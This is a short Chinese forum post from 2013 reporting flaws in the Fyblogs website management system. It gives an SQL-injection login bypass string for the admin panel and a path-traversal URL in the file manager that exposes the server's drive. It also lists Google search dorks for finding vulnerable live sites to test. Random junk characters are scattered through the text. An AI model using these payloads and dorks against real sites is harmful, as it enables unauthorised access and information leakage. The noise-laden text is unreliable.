漏洞类型: 未授权访问/权限绕过* `2 g* {7 j1 s: n- A% m
/ F8 {2 Z1 z! S简要描述:; n6 N6 N; n' K7 ?* }
/ e" J$ j0 P$ _Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!% y7 I2 M' O2 d2 }( i6 q4 H! {
7 m5 j5 M5 e' N$ t% F
详细说明:
: T' p) B1 T* R( [) h
( j. Q$ K; X y Y6 J后台万能密码 'or'='or', Q0 q1 }9 B7 H8 |
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露! o/ I. O8 s. V$ v% Q$ W& t
admin/uploadfile.asp?currentFolder=/upfiles/../ ]- Y E2 j! H7 X: Y* o
[$ U. w7 U0 Q1 s5 j" @1 w漏洞证明:
6 A* {' y* {. ^8 O5 f8 W$ a% v
! E! b9 \* z! B# `0 z0 j谷歌:inurl:type.asp?id=1 新闻中心
0 |3 p3 s3 x, Z3 m或者 :inurl:download_ok.asp?
" U! G$ z; |; M# i# |
; j- m2 ~3 m, c" y) E可以测试
; v) t; H0 w4 ^- i( i7 ~( v1 l( Z) ^+ c5 k) _
5 u @5 E0 j, L! s) q! v! f |
发表于 2013-3-7 13:07:46
收藏
支持
反对